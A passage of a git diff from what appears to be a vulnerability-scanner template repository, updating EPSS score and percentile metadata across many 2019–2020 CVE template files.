b/http/cves/2019/CVE-2019-3401.yaml index 28c0506e38d..e346853d944 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-3401 cwe-id: CWE-863 epss-score: 0.64371 - epss-percentile: 0.98383 + epss-percentile: 0.98385 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index 331cc7bcd21..52012e56f62 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-3402 cwe-id: CWE-79 epss-score: 0.12577 - epss-percentile: 0.9374 + epss-percentile: 0.93735 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index ac9e0090b7b..c08231c3650 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-3799 cwe-id: CWE-22 epss-score: 0.9117 - epss-percentile: 0.99628 + epss-percentile: 0.99627 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 5f3cfb92838..5fc325913a2 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-3911 cwe-id: CWE-79 epss-score: 0.01482 - epss-percentile: 0.80603 + epss-percentile: 0.80592 cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index c3f0794c78b..17725225074 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-3912 cwe-id: CWE-601 epss-score: 0.08738 - epss-percentile: 0.9225 + epss-percentile: 0.92244 cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index b076598fb29..da2e928720e 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-5127 cwe-id: CWE-78 epss-score: 0.93982 - epss-percentile: 0.99882 + epss-percentile: 0.99881 cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-5129.yaml b/http/cves/2019/CVE-2019-5129.yaml index a41006cb589..54932724b3b 100644 --- a/http/cves/2019/CVE-2019-5129.yaml +++ b/http/cves/2019/CVE-2019-5129.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-5129 cwe-id: CWE-78 epss-score: 0.9306 - epss-percentile: 0.99775 + epss-percentile: 0.99774 cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-5591.yaml b/http/cves/2019/CVE-2019-5591.yaml index 8a5d489584a..cea088bf863 100644 --- a/http/cves/2019/CVE-2019-5591.yaml +++ b/http/cves/2019/CVE-2019-5591.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2019-5591 - epss-score: 0.49178 - epss-percentile: 0.97686 + epss-score: 0.56819 + epss-percentile: 0.98047 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-6703.yaml b/http/cves/2019/CVE-2019-6703.yaml index 3ad7bb04bb9..2325dde91a4 100644 --- a/http/cves/2019/CVE-2019-6703.yaml +++ b/http/cves/2019/CVE-2019-6703.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-6703 - epss-score: 0.54383 - epss-percentile: 0.97936 + epss-score: 0.53839 + epss-percentile: 0.9791 cpe: cpe:2.3:a:calmar-webmedia:total_donations:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index 8eb6c29bf2f..cc03b42297c 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-6715 epss-score: 0.90796 - epss-percentile: 0.99604 + epss-percentile: 0.99602 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 3b316d9355a..4ffcd7bd43b 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-6802 cwe-id: CWE-74 epss-score: 0.01051 - epss-percentile: 0.77104 + epss-percentile: 0.77095 cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index e8a1dea8cff..9d32d0d3588 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-7139 cwe-id: CWE-89 epss-score: 0.62993 - epss-percentile: 0.98322 + epss-percentile: 0.98324 cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7195.yaml b/http/cves/2019/CVE-2019-7195.yaml index f615cd4db8a..367df493804 100644 --- a/http/cves/2019/CVE-2019-7195.yaml +++ b/http/cves/2019/CVE-2019-7195.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2019-7195 cwe-id: CWE-22 epss-score: 0.93454 - epss-percentile: 0.99811 + epss-percentile: 0.9981 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: vendor: qnap diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index f2bf1b96fe3..9b6ec692ae2 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7219 cwe-id: CWE-79 epss-score: 0.43975 - epss-percentile: 0.97423 + epss-percentile: 0.9742 cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 7b70f67b3e9..3f6d351f474 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-7238 epss-score: 0.94379 - epss-percentile: 0.99965 + epss-percentile: 0.99964 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 842d58e2c05..0e9e297b1e4 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7254 cwe-id: CWE-22 epss-score: 0.90623 - epss-percentile: 0.99594 + epss-percentile: 0.99593 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 72342a2a0a6..9727423a685 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7275 cwe-id: CWE-601 epss-score: 0.6577 - epss-percentile: 0.98447 + epss-percentile: 0.98449 cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index ee2cbec018f..914e025e579 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7481 cwe-id: CWE-89 epss-score: 0.9438 - epss-percentile: 0.99965 + epss-percentile: 0.99964 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index d5935ce31df..7ef61be78c7 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7543 cwe-id: CWE-79 epss-score: 0.02849 - epss-percentile: 0.85833 + epss-percentile: 0.85831 cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 857ff164a22..201419d80c2 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7609 cwe-id: CWE-94 epss-score: 0.94446 - epss-percentile: 0.9999 + epss-percentile: 0.99989 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 221305a8aa1..a9ea6b0ee0d 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-8086 cwe-id: CWE-611 epss-score: 0.54798 - epss-percentile: 0.97957 + epss-percentile: 0.97956 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index 80575d12651..9dc531803ed 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-8390 cwe-id: CWE-79 epss-score: 0.02661 - epss-percentile: 0.85376 + epss-percentile: 0.85372 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 99965c4a394..a4880681323 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-8449 cwe-id: CWE-306 - epss-score: 0.68722 - epss-percentile: 0.98564 + epss-score: 0.7108 + epss-percentile: 0.98658 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index d717caacda1..a4d5fd6dde1 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-8451 cwe-id: CWE-918 - epss-score: 0.92505 - epss-percentile: 0.99724 + epss-score: 0.92278 + epss-percentile: 0.99706 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index dcb1f494720..7ea3e80e76c 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-8903 cwe-id: CWE-22 epss-score: 0.53251 - epss-percentile: 0.97882 + epss-percentile: 0.97879 cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index a6b0d74157b..22f64188609 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-8937 cwe-id: CWE-79 epss-score: 0.50859 - epss-percentile: 0.97768 + epss-percentile: 0.97764 cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9082.yaml b/http/cves/2019/CVE-2019-9082.yaml index 8327d8c0eeb..d2af40adbad 100644 --- a/http/cves/2019/CVE-2019-9082.yaml +++ b/http/cves/2019/CVE-2019-9082.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cwe-id: CWE-94 cpe: cpe:2.3:a:opensourcebms:open_source_background_management_system:1.1.1:*:*:*:*:*:*:* - epss-score: 0.93965 - epss-percentile: 0.99877 + epss-score: 0.94218 + epss-percentile: 0.99917 metadata: verified: true max-request: 2 diff --git a/http/cves/2019/CVE-2019-9194.yaml b/http/cves/2019/CVE-2019-9194.yaml index da5cf5ce61f..8f6ed8e744b 100644 --- a/http/cves/2019/CVE-2019-9194.yaml +++ b/http/cves/2019/CVE-2019-9194.yaml @@ -23,8 +23,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9194 cwe-id: CWE-78 - epss-score: 0.93033 - epss-percentile: 0.99772 + epss-score: 0.93216 + epss-percentile: 0.99786 metadata: verified: true max-request: 3 diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index 26883151a56..6376c7fea97 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9733 epss-score: 0.91735 - epss-percentile: 0.99665 + epss-percentile: 0.99664 cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9879.yaml b/http/cves/2019/CVE-2019-9879.yaml index 5007d6cfa7e..0b95c06d14c 100644 --- a/http/cves/2019/CVE-2019-9879.yaml +++ b/http/cves/2019/CVE-2019-9879.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-9879 cwe-id: CWE-306 epss-score: 0.77634 - epss-percentile: 0.98945 + epss-percentile: 0.98944 cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9880.yaml b/http/cves/2019/CVE-2019-9880.yaml index c0306c5335e..0560745f07f 100644 --- a/http/cves/2019/CVE-2019-9880.yaml +++ b/http/cves/2019/CVE-2019-9880.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-9880 cwe-id: CWE-306 epss-score: 0.6462 - epss-percentile: 0.98394 + epss-percentile: 0.98396 cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9912.yaml b/http/cves/2019/CVE-2019-9912.yaml index da79ca1a667..f973974a820 100644 --- a/http/cves/2019/CVE-2019-9912.yaml +++ b/http/cves/2019/CVE-2019-9912.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-9912 cwe-id: CWE-79 epss-score: 0.00387 - epss-percentile: 0.59295 + epss-percentile: 0.5929 cpe: cpe:2.3:a:wpgmaps:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index dc8914ccd79..fe5f6394d3a 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-9915 cwe-id: CWE-601 epss-score: 0.08964 - epss-percentile: 0.92352 + epss-percentile: 0.92347 cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index 5a4a3683f05..4f91ff61ebf 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-9955 cwe-id: CWE-79 epss-score: 0.11615 - epss-percentile: 0.93443 + epss-percentile: 0.93436 cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index 0a2b947b9e8..83cd3318a25 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-9978 cwe-id: CWE-79 epss-score: 0.87417 - epss-percentile: 0.99433 + epss-percentile: 0.99435 cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index ec9c81666ea..d25d604c495 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-10220 cwe-id: CWE-89 epss-score: 0.94024 - epss-percentile: 0.9989 + epss-percentile: 0.99889 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-10257.yaml b/http/cves/2020/CVE-2020-10257.yaml index a11ac525add..3901711a221 100644 --- a/http/cves/2020/CVE-2020-10257.yaml +++ b/http/cves/2020/CVE-2020-10257.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10257 epss-score: 0.47784 - epss-percentile: 0.97615 + epss-percentile: 0.97609 cwe-id: CWE-94 cpe: cpe:2.3:a:themerex:addons:1.70.3:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index 834f9533313..c2dc3085192 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-10547 cwe-id: CWE-89 epss-score: 0.89969 - epss-percentile: 0.99558 + epss-percentile: 0.99557 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 1e9fb4e2a44..42d5056cd85 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-10770 cwe-id: CWE-918 epss-score: 0.92282 - epss-percentile: 0.99707 + epss-percentile: 0.99706 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10987.yaml b/http/cves/2020/CVE-2020-10987.yaml index 87cc9c44cd2..d24fbfdf4bd 100644 --- a/http/cves/2020/CVE-2020-10987.yaml +++ b/http/cves/2020/CVE-2020-10987.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-10987 cwe-id: CWE-78 epss-score: 0.93625 - epss-percentile: 0.99826 + epss-percentile: 0.99828 cpe: cpe:2.3:o:tenda:ac15_firmware:15.03.05.19:*:*:*:*:*:*:* metadata: shodan-query: http.title:"tenda wifi" diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 9dd13107a79..37b6c4fb584 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11034 cwe-id: CWE-601,CWE-185 epss-score: 0.55796 - epss-percentile: 0.98008 + epss-percentile: 0.98006 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-11441.yaml b/http/cves/2020/CVE-2020-11441.yaml index 1cd58251f8d..8718488d1f6 100644 --- a/http/cves/2020/CVE-2020-11441.yaml +++ b/http/cves/2020/CVE-2020-11441.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-11441 cwe-id: CWE-93 epss-score: 0.00653 - epss-percentile: 0.7037 + epss-percentile: 0.70349 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:5.0.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-11515.yaml b/http/cves/2020/CVE-2020-11515.yaml index 251dfa60898..6c748ef64ba 100644 --- a/http/cves/2020/CVE-2020-11515.yaml +++ b/http/cves/2020/CVE-2020-11515.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11515 cwe-id: CWE-601 epss-score: 0.00857 - epss-percentile: 0.74517 + epss-percentile: 0.74499 cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index a5744b6da0a..633f1217e8e 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11710 epss-score: 0.94027 - epss-percentile: 0.9989 + epss-percentile: 0.99889 cpe: cpe:2.3:a:konghq:docker-kong:*:*:*:*:*:kong:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index dddeb0912bd..6d22329770e 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -21,7 +21,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-11853 epss-score: 0.92549 - epss-percentile: 0.99728 + epss-percentile: 0.99727 cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 57e124d91fc..886b18483c3 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-11854 cwe-id: CWE-798 epss-score: 0.92403 - epss-percentile: 0.99716 + epss-percentile: 0.99715 cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index efa6abefa0b..e3c2f06458c 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-11930 cwe-id: CWE-79 epss-score: 0.04451 - epss-percentile: 0.88722 + epss-percentile: 0.8872 cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11975.yaml b/http/cves/2020/CVE-2020-11975.yaml index 226fdcea99a..7f6546e8ed7 100644 --- a/http/cves/2020/CVE-2020-11975.yaml +++ b/http/cves/2020/CVE-2020-11975.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11975 cwe-id: CWE-94 - epss-score: 0.8271 - epss-percentile: 0.99211 + epss-score: 0.84969 + epss-percentile: 0.99314 cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 91c565a1cd1..ea7595bc1a1 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11991 cwe-id: CWE-611 epss-score: 0.93142 - epss-percentile: 0.99782 + epss-percentile: 0.99781 cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 856b1898276..6ffc970982a 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-12054 cwe-id: CWE-79 epss-score: 0.04584 - epss-percentile: 0.88896 + epss-percentile: 0.88894 cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index d835ab5da42..b1c4b0c22d8 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-12256 cwe-id: CWE-79 epss-score: 0.54902 - epss-percentile: 0.97962 + epss-percentile: 0.97959 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-12262.yaml b/http/cves/2020/CVE-2020-12262.yaml index cb136c6c1e3..72d1706d032 100644 --- a/http/cves/2020/CVE-2020-12262.yaml +++ b/http/cves/2020/CVE-2020-12262.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-12262 cwe-id: CWE-79 epss-score: 0.01038 - epss-percentile: 0.76961 + epss-percentile: 0.76951 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 metadata: diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 96386767064..982fbe91780 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12720 cwe-id: CWE-306 - epss-score: 0.9382 - epss-percentile: 0.99855 + epss-score: 0.93867 + epss-percentile: 0.99862 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12832.yaml b/http/cves/2020/CVE-2020-12832.yaml index b1302accbeb..e3ea5ee051f 100644 --- a/http/cves/2020/CVE-2020-12832.yaml +++ b/http/cves/2020/CVE-2020-12832.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-12832 - epss-score: 0.73235 - epss-percentile: 0.98745 + epss-score: 0.73101 + epss-percentile: 0.9874 cwe-id: CWE-22 cpe: cpe:2.3:a:simplefilelist:simple-file-list::::::wordpress::* metadata: diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index ae5f70ae544..5e0b3476eee 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13121 cwe-id: CWE-601 - epss-score: 0.1626 - epss-percentile: 0.94612 + epss-score: 0.1979 + epss-percentile: 0.95252 cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13125.yaml b/http/cves/2020/CVE-2020-13125.yaml index 0cbcc0fa9ac..905933995ee 100644 --- a/http/cves/2020/CVE-2020-13125.yaml +++ b/http/cves/2020/CVE-2020-13125.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2020-13125 - epss-score: 0.21581 - epss-percentile: 0.95544 + epss-score: 0.11265 + epss-percentile: 0.93299 cwe-id: NVD-CWE-noinfo cpe: cpe:2.3:a:brainstormforce:ultimate_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index a7c6b5cd5a1..3089022fe6e 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ 